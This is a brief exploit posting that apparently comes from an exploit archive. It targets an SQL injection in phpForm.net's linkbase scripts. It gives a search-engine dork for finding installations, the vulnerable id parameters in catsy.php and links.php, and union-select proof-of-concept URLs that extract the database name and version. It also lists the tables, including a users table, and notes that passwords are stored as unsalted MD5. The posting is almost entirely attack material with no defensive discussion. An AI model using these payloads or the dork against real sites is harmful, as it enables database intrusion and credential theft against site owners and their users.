---------------------------------------------------------------- Typ: SQL-Injection Risiko: Hoch Dork: intext:"Powered by phpForm.net" ---------------------------------------------------------------- Producer Website: http://phpform.net/ ---------------------------------------------------------------- Author: Padrino Greetz to: Shisha | Ch1nch1lla | unnex Email: 1lpadrino [ a t ] web [ d o t ] de ---------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~ http://127.0.0.1/linkbase/catsy.php?id=1'[SQLi] http://127.0.0.1/linkbase/links.php?id=1'[SQLi] PoC: ~~~~~~~~~~~~ http://127.0.0.1/linkbase/catsy.php?id=-1'+union+select+1,database(),3,4,5,6,version(),8,9,10--+ http://127.0.0.1/linkbase/links.php?id=1'+union+select+1,database(),3,4,5,6,7,8,version(),10--+ Tables: oscaty oslink osrev users Passwort = MD5